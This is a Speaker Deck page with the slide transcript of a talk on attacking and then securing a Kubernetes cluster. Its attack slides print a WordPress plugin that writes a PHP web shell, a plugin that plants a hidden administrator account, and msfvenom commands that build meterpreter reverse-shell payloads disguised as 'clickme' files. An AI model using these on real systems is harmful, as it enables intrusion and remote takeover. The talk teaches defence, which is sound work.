Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Attacking a K8s cluster and how defending it
Search
Johann du Toit
October 31, 2019
Technology
73
0
Share
Attacking a K8s cluster and how defending it
Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.
Johann du Toit
October 31, 2019
More Decks by Johann du Toit
See All by Johann du Toit
Natural Language, Unnatural Access: The Emerging LLM Attack Pattern
johanndutoit
0
29
RESPECTING THE MICROSERVICE.
johanndutoit
1
87
Why so serious? Using GCP for realtime video context analyzation
johanndutoit
0
89
Progressive Web Apps in 15 Minutes
johanndutoit
0
52
The Machine Learning Intervention
johanndutoit
0
75
Progressive Web Apps
johanndutoit
0
100
Progressive Web Apps
johanndutoit
0
110
Launchpad Start Day 2 - Google Design Sprints
johanndutoit
2
140
Google Design Sprints
johanndutoit
0
99
Other Decks in Technology
See All in Technology
形式手法特論:公平性制約の位相的特徴づけ #kernelvm / Kernel VM Study Kansai 12th
ytaka23
1
390
OpenID Connectによるサービス間連携
takesection
0
110
Copilot CLI・IDE・Web・スマホで途切れない開発フローを目指して / One Copilot flow - CLI IDE Web Mobile
aeonpeople
1
1.1k
サプライチェーン攻撃への備えについて考えている #湘なんか
stefafafan
3
2.4k
Generative UI × A2UI で AI エージェントを作った話 AI-DLC も使ってみた!
kmiya84377
1
230
Node.js+TypeScriptにおけるCJS/ESM相互運用の最新ポイント
grainrigi
2
120
DI コンテナ自動生成ツールを実装してみた / intro-autodi
uhzz
0
870
最低限これだけ押さえれ大丈夫_Claude Enterprise/Team企業展開ガバナンス入門
tkikuchi
1
170
Anthropic AIネイティブ・スタートアップ構築のプレイブック を理解する
nagatsu
0
190
layerx-fde-practices
cipepser
6
2.7k
自作エディターをOSSにして分かった、一人に刺さる開発が世界を動かす理由
shinyasaita
1
420
AI とサービス・デザイン / AI and Service Design
ks91
PRO
0
170
Featured
See All Featured
The Limits of Empathy - UXLibs8
cassininazir
1
340
jQuery: Nuts, Bolts and Bling
dougneiner
66
8.5k
Building Flexible Design Systems
yeseniaperezcruz
330
40k
VelocityConf: Rendering Performance Case Studies
addyosmani
333
25k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
12
1.7k
Navigating Team Friction
lara
192
16k
Building Applications with DynamoDB
mza
96
7k
Heart Work Chapter 1 - Part 1
lfama
PRO
7
36k
Embracing the Ebb and Flow
colly
88
5k
コードの90%をAIが書く世界で何が待っているのか / What awaits us in a world where 90% of the code is written by AI
rkaga
61
44k
The Organizational Zoo: Understanding Human Behavior Agility Through Metaphoric Constructive Conversations (based on the works of Arthur Shelley, Ph.D)
kimpetersen
PRO
0
340
The MySQL Ecosystem @ GitHub 2015
samlambert
251
13k
Transcript
Bust a Kube: Let’s attack a Kubernetes cluster and secure
it along the way
None
None
None
None
None
None
WHAT ATTACKING DEFENDING
None
WHAT ATTACKING OMG HELP
None
None
None
PODS NODES SERVICES NAMESPACES
POD Pods are the smallest unit of work in kubernetes
All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume
Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim
e pod #1 pod #2 pod #3
Services A service is a load balancer, create a DNS
name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic
Services A service is a load balancer, create a DNS
name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web
Namespaces Logical grouping of resources and the first hint of
multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
None
> kubectl apply -f app.yaml
None
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
POD Pods are the smallest unit of work in kubernetes
All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
None
None
<?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo
shell_exec($_REQUEST[“c”]);’ ); } ?>
None
None
<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')
{ require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>
“Head over to your site and try the function. It’s
fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
None
None
None
None
None
None
None
Kali Linux
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f sh \ -o clickme.sh
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f elf \ -o clickme
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f exe \ -o clickme.exe
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f macho \ -o clickme.macho
None
None
None
None
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
CONTROL PLANE NETWORKING HOST RUNTIME
CONTROL PLANE NETWORKING HOST RUNTIME
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
None
None
None
None
None
None
UPGRADE!
None
Role Based Access Control
“RBAC”
None
Role: MarketingAdmin Role: Developer
apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:
- apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer
apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:
- apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding
CONTROL PLANE NETWORKING HOST RUNTIME
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 Step 1: Run as Non Root
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping
CONTROL PLANE NETWORKING HOST RUNTIME
apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:
tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
None
None
None
CONTROL PLANE NETWORKING HOST RUNTIME
None
None
Minimal Host OS
None
AppArmor
seccomp
Questions?
• CIS Benchmark - CIS Security • Kube-bench - Aqua
Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec
Security is a not a noun you refer to every
now and then, it’s a verb and involves constant and specific action
Thanks!
[email protected]
@signedness
johanndutoit
ytaka23
takesection
aeonpeople
stefafafan
kmiya84377
uhzz
tkikuchi
nagatsu
cipepser
shinyasaita
ks91
cassininazir
dougneiner
yeseniaperezcruz
addyosmani
tammyeverts
lara
mza
lfama
colly
rkaga
kimpetersen
samlambert
![<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')](https://files.speakerdeck.com/presentations/83900f2b77014b15b5401b7e9b99a5c5/slide_29.jpg){kind=link}
![Thanks! [email protected] @signedness](https://files.speakerdeck.com/presentations/83900f2b77014b15b5401b7e9b99a5c5/slide_84.jpg){kind=link}